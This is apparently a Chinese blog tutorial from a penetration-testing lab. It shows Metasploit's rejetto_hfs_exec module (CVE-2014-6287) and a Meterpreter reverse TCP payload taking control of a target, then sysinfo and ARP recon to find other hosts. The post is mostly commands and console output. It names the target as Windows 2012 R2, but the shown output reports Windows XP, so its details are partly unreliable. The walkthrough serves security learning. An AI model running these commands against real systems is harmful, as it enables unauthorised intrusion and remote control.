Metasploit实战三之——使用Metasploit获取目标的控制权限

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86607498

攻击机： Kali 192.168.175.128

靶机： Win2012 R2 192.168.175.130

在上一篇《对威胁建模(附加搭建CVE:2014-6287漏洞环境)》中，我们确定了目标系统的漏洞和Metasploit的可利用模块，接下来我们就真正获取目标的控制权限。

msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOST 192.168.175.130
set RPORT 8080
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.175.128
exploit

具体操作如下：

msf5 > use exploit/windows/http/rejetto_hfs_exec 
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOST 192.168.175.130
RHOST => 192.168.175.130
msf5 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
RPORT => 8080
msf5 exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.175.130  yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.175.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 
[*] Using URL: http://0.0.0.0:8080/OHqKAjyg9dj9u
[*] Local IP: http://192.168.175.128:8080/OHqKAjyg9dj9u
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /OHqKAjyg9dj9u
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1091) at 2019-01-23 11:32:15 +0800
[!] Tried to delete %TEMP%\OmpsEelxzVs.vbs, unknown result
[*] Server stopped.

meterpreter > 

执行完后，我们就获得了目标主机的控制权。

接下来，我们看看内网中有没有其他主机，如下所示：

meterpreter > sysinfo
Computer        : LIUYAZHUANG
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
meterpreter > arp

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    192.168.175.2    00:50:56:e7:f5:30  2
    192.168.175.128  00:0c:29:68:65:5b  2
    192.168.175.131  00:0c:29:cf:f6:ac  2

meterpreter > 

可以看到内网中有一台192.168.175.131的主机。